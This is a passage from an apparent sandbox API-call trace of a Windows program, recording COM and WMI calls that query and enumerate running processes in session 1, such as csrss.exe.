pServerPrincName=0x43e824, pAuthnLevel=0x43e828*=0x6, pImpLevel=0x43e818*=0x2, pAuthInfo=0x43e81c, pCapabilites=0x43e820*=0x1) returned 0x0 [0278.885] WbemLocator:IUnknown:Release (This=0x58dd8c) returned 0x1 [0278.885] WbemLocator:IUnknown:QueryInterface (in: This=0x5ada30, riid=0x6c3135a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e7d4 | out: ppvObject=0x43e7d4*=0x58ddac) returned 0x0 [0278.885] WbemLocator:IUnknown:QueryInterface (in: This=0x5ada30, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e7c0 | out: ppvObject=0x43e7c0*=0x58dd8c) returned 0x0 [0278.885] WbemLocator:IClientSecurity:SetBlanket (This=0x58dd8c, pProxy=0x5ada30, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0278.885] WbemLocator:IUnknown:Release (This=0x58dd8c) returned 0x2 [0278.885] WbemLocator:IUnknown:Release (This=0x58ddac) returned 0x1 [0278.885] CoTaskMemFree (pv=0x56ecca8) [0278.885] WbemLocator:IUnknown:AddRef (This=0x5ada30) returned 0x2 [0278.885] WbemLocator:IUnknown:Release (This=0x56e9e80) returned 0x0 [0278.886] CoGetContextToken (in: pToken=0x43dd14 | out: pToken=0x43dd14) returned 0x0 [0278.886] CoGetContextToken (in: pToken=0x43e124 | out: pToken=0x43e124) returned 0x0 [0278.886] WbemLocator:IUnknown:QueryInterface (in: This=0x5ada30, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0c0 | out: ppvObject=0x43e0c0*=0x58dd94) returned 0x0 [0278.886] WbemLocator:IRpcOptions:Query (in: This=0x58dd94, pPrx=0x56e3478, dwProperty=2, pdwValue=0x43e1b4 | out: pdwValue=0x43e1b4) returned 0x80004002 [0278.886] WbemLocator:IUnknown:Release (This=0x58dd94) returned 0x2 [0278.886] CoGetContextToken (in: pToken=0x43e6f4 | out: pToken=0x43e6f4) returned 0x0 [0278.886] CoGetContextToken (in: pToken=0x43e654 | out: pToken=0x43e654) returned 0x0 [0278.886] WbemLocator:IUnknown:QueryInterface (in: This=0x5ada30, riid=0x43e724*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x43e5f0 | out: ppvObject=0x43e5f0*=0x5ada30) returned 0x0 [0278.887] WbemLocator:IUnknown:Release (This=0x5ada30) returned 0x2 [0278.887] SysStringLen (param_1=0x0) returned 0x0 [0278.887] CoGetContextToken (in: pToken=0x43e7f4 | out: pToken=0x43e7f4) returned 0x0 [0278.887] IWbemServices:ExecQuery (in: This=0x5ada30, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Process Where SessionId='1'", lFlags=16, pCtx=0x0, ppEnum=0x43ea1c | out: ppEnum=0x43ea1c*=0x511530) returned 0x0 [0278.896] IUnknown:QueryInterface (in: This=0x511530, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e854 | out: ppvObject=0x43e854*=0x511534) returned 0x0 [0278.896] IClientSecurity:QueryBlanket (in: This=0x511534, pProxy=0x511530, pAuthnSvc=0x43e8a4, pAuthzSvc=0x43e8a0, pServerPrincName=0x43e898, pAuthnLevel=0x43e89c, pImpLevel=0x43e88c, pAuthInfo=0x43e890, pCapabilites=0x43e894 | out: pAuthnSvc=0x43e8a4*=0xa, pAuthzSvc=0x43e8a0*=0x0, pServerPrincName=0x43e898, pAuthnLevel=0x43e89c*=0x6, pImpLevel=0x43e88c*=0x2, pAuthInfo=0x43e890, pCapabilites=0x43e894*=0x1) returned 0x0 [0278.896] IUnknown:Release (This=0x511534) returned 0x1 [0278.896] IUnknown:QueryInterface (in: This=0x511530, riid=0x6c3135a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e848 | out: ppvObject=0x43e848*=0x58dadc) returned 0x0 [0278.896] IUnknown:QueryInterface (in: This=0x511530, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e834 | out: ppvObject=0x43e834*=0x511534) returned 0x0 [0278.896] IClientSecurity:SetBlanket (This=0x511534, pProxy=0x511530, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0278.941] IUnknown:Release (This=0x511534) returned 0x2 [0278.941] WbemLocator:IUnknown:Release (This=0x58dadc) returned 0x1 [0278.941] CoTaskMemFree (pv=0x56eccd8) [0278.941] IUnknown:AddRef (This=0x511530) returned 0x2 [0278.941] CoGetContextToken (in: pToken=0x43dd74 | out: pToken=0x43dd74) returned 0x0 [0278.941] CoGetContextToken (in: pToken=0x43e184 | out: pToken=0x43e184) returned 0x0 [0278.941] IUnknown:QueryInterface (in: This=0x511530, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e120 | out: ppvObject=0x43e120*=0x58dac4) returned 0x0 [0278.942] WbemLocator:IRpcOptions:Query (in: This=0x58dac4, pPrx=0x56e34a8, dwProperty=2, pdwValue=0x43e214 | out: pdwValue=0x43e214) returned 0x80004002 [0278.942] WbemLocator:IUnknown:Release (This=0x58dac4) returned 0x2 [0278.942] CoGetContextToken (in: pToken=0x43e754 | out: pToken=0x43e754) returned 0x0 [0278.942] CoGetContextToken (in: pToken=0x43e6b4 | out: pToken=0x43e6b4) returned 0x0 [0278.942] IUnknown:QueryInterface (in: This=0x511530, riid=0x43e784*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x43e650 | out: ppvObject=0x43e650*=0x511530) returned 0x0 [0278.942] IUnknown:Release (This=0x511530) returned 0x2 [0278.942] SysStringLen (param_1=0x0) returned 0x0 [0278.942] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea68 | out: puCount=0x43ea68*=0x2) returned 0x0 [0278.942] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea64*=0x0, pszText=0x0 | out: puBuffLength=0x43ea64*=0xf, pszText=0x0) returned 0x0 [0278.942] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea64*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea64*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0278.942] CoGetContextToken (in: pToken=0x43e8bc | out: pToken=0x43e8bc) returned 0x0 [0278.943] IEnumWbemClassObject:Clone (in: This=0x511530, ppEnum=0x43ea74 | out: ppEnum=0x43ea74*=0x5115f8) returned 0x0 [0278.944] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e930 | out: ppvObject=0x43e930*=0x5115fc) returned 0x0 [0278.944] IClientSecurity:QueryBlanket (in: This=0x5115fc, pProxy=0x5115f8, pAuthnSvc=0x43e980, pAuthzSvc=0x43e97c, pServerPrincName=0x43e974, pAuthnLevel=0x43e978, pImpLevel=0x43e968, pAuthInfo=0x43e96c, pCapabilites=0x43e970 | out: pAuthnSvc=0x43e980*=0xa, pAuthzSvc=0x43e97c*=0x0, pServerPrincName=0x43e974, pAuthnLevel=0x43e978*=0x6, pImpLevel=0x43e968*=0x2, pAuthInfo=0x43e96c, pCapabilites=0x43e970*=0x1) returned 0x0 [0278.944] IUnknown:Release (This=0x5115fc) returned 0x1 [0278.944] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x6c3135a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e924 | out: ppvObject=0x43e924*=0x58df8c) returned 0x0 [0278.944] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x6c3135b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e910 | out: ppvObject=0x43e910*=0x5115fc) returned 0x0 [0278.944] IClientSecurity:SetBlanket (This=0x5115fc, pProxy=0x5115f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0278.945] IUnknown:Release (This=0x5115fc) returned 0x2 [0278.945] WbemLocator:IUnknown:Release (This=0x58df8c) returned 0x1 [0278.945] CoTaskMemFree (pv=0x56ecd08) [0278.946] IUnknown:AddRef (This=0x5115f8) returned 0x2 [0278.946] CoGetContextToken (in: pToken=0x43de40 | out: pToken=0x43de40) returned 0x0 [0278.946] CoGetContextToken (in: pToken=0x43e254 | out: pToken=0x43e254) returned 0x0 [0278.946] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e1ec | out: ppvObject=0x43e1ec*=0x58df74) returned 0x0 [0278.946] WbemLocator:IRpcOptions:Query (in: This=0x58df74, pPrx=0x56e3628, dwProperty=2, pdwValue=0x43e2e0 | out: pdwValue=0x43e2e0) returned 0x80004002 [0278.946] WbemLocator:IUnknown:Release (This=0x58df74) returned 0x2 [0278.946] CoGetContextToken (in: pToken=0x43e824 | out: pToken=0x43e824) returned 0x0 [0278.946] CoGetContextToken (in: pToken=0x43e784 | out: pToken=0x43e784) returned 0x0 [0278.946] IUnknown:QueryInterface (in: This=0x5115f8, riid=0x43e854*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x43e720 | out: ppvObject=0x43e720*=0x5115f8) returned 0x0 [0278.947] IUnknown:Release (This=0x5115f8) returned 0x2 [0278.947] SysStringLen (param_1=0x0) returned 0x0 [0278.947] IEnumWbemClassObject:Reset (This=0x5115f8) returned 0x0 [0278.947] CoTaskMemAlloc (cb=0x4) returned 0x56e9f70 [0278.947] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56e9f70, puReturned=0x27bb39c | out: apObjects=0x56e9f70*=0x594ad8, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.011] IUnknown:QueryInterface (in: This=0x594ad8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x594ad8) returned 0x0 [0279.011] IUnknown:QueryInterface (in: This=0x594ad8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.011] IUnknown:QueryInterface (in: This=0x594ad8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.011] IUnknown:AddRef (This=0x594ad8) returned 0x3 [0279.012] IUnknown:QueryInterface (in: This=0x594ad8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.012] IUnknown:QueryInterface (in: This=0x594ad8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.012] IUnknown:QueryInterface (in: This=0x594ad8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x594adc) returned 0x0 [0279.012] IMarshal:GetUnmarshalClass (in: This=0x594adc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.012] IUnknown:Release (This=0x594adc) returned 0x3 [0279.012] CoGetContextToken (in: pToken=0x43d9f8 | out: pToken=0x43d9f8) returned 0x0 [0279.012] CoGetContextToken (in: pToken=0x43de0c | out: pToken=0x43de0c) returned 0x0 [0279.012] IUnknown:QueryInterface (in: This=0x594ad8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.012] IUnknown:Release (This=0x594ad8) returned 0x2 [0279.012] CoGetContextToken (in: pToken=0x43e3f4 | out: pToken=0x43e3f4) returned 0x0 [0279.012] CoGetContextToken (in: pToken=0x43e354 | out: pToken=0x43e354) returned 0x0 [0279.012] IUnknown:QueryInterface (in: This=0x594ad8, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x594ad8) returned 0x0 [0279.012] IUnknown:AddRef (This=0x594ad8) returned 0x4 [0279.012] IUnknown:Release (This=0x594ad8) returned 0x3 [0279.012] IUnknown:Release (This=0x594ad8) returned 0x2 [0279.012] CoTaskMemFree (pv=0x56e9f70) [0279.012] CoGetContextToken (in: pToken=0x43e764 | out: pToken=0x43e764) returned 0x0 [0279.013] IUnknown:AddRef (This=0x594ad8) returned 0x3 [0279.013] IWbemClassObject:Get (in: This=0x594ad8, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.013] IWbemClassObject:Get (in: This=0x594ad8, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.013] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x64 [0279.013] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x64 [0279.013] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.013] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.013] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.013] IUnknown:Release (This=0x500344) returned 0x1 [0279.014] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x56e9f70) returned 0x0 [0279.014] WbemDefPath:IUnknown:QueryInterface (in: This=0x56e9f70, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.014] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56e9f70, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5a9098) returned 0x0 [0279.014] WbemDefPath:IUnknown:Release (This=0x56e9f70) returned 0x0 [0279.014] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9098, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5a9098) returned 0x0 [0279.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9098, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.015] WbemDefPath:IUnknown:AddRef (This=0x5a9098) returned 0x3 [0279.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9098, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9098, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9098, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x56e9f80) returned 0x0 [0279.015] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56e9f80, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.015] WbemDefPath:IUnknown:Release (This=0x56e9f80) returned 0x3 [0279.015] CoGetContextToken (in: pToken=0x43db50 | out: pToken=0x43db50) returned 0x0 [0279.015] CoGetContextToken (in: pToken=0x43df64 | out: pToken=0x43df64) returned 0x0 [0279.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9098, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.015] WbemDefPath:IUnknown:Release (This=0x5a9098) returned 0x2 [0279.015] WbemDefPath:IUnknown:Release (This=0x5a9098) returned 0x1 [0279.015] CoGetContextToken (in: pToken=0x43e8f4 | out: pToken=0x43e8f4) returned 0x0 [0279.015] CoGetContextToken (in: pToken=0x43e854 | out: pToken=0x43e854) returned 0x0 [0279.015] WbemDefPath:IUnknown:QueryInterface (in: This=0x5a9098, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5a9098) returned 0x0 [0279.015] WbemDefPath:IUnknown:AddRef (This=0x5a9098) returned 0x3 [0279.015] WbemDefPath:IUnknown:Release (This=0x5a9098) returned 0x2 [0279.015] WbemDefPath:IWbemPath:SetText (This=0x5a9098, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"380\"") returned 0x0 [0279.016] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.016] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.016] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.016] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.016] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.016] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.016] IWbemClassObject:Get (in: This=0x594ad8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bbbd4*=0, plFlavor=0x27bbbd8*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="csrss.exe", varVal2=0x0), pType=0x27bbbd4*=8, plFlavor=0x27bbbd8*=0) returned 0x0 [0279.016] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0279.016] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0279.016] IWbemClassObject:Get (in: This=0x594ad8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27bbbd4*=8, plFlavor=0x27bbbd8*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="csrss.exe", varVal2=0x0), pType=0x27bbbd4*=8, plFlavor=0x27bbbd8*=0) returned 0x0 [0279.016] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0279.016] SysStringByteLen (bstr="csrss.exe") returned 0x12 [0279.016] CoTaskMemAlloc (cb=0x4) returned 0x56e9fc0 [0279.016] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x56e9fc0, puReturned=0x27bb39c | out: apObjects=0x56e9fc0*=0x594e08, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.050] IUnknown:QueryInterface (in: This=0x594e08, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x594e08) returned 0x0 [0279.050] IUnknown:QueryInterface (in: This=0x594e08, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.050] IUnknown:QueryInterface (in: This=0x594e08, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.050] IUnknown:AddRef (This=0x594e08) returned 0x3 [0279.050] IUnknown:QueryInterface (in: This=0x594e08, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.050] IUnknown:QueryInterface (in: This=0x594e08, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.050] IUnknown:QueryInterface (in: This=0x594e08, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, 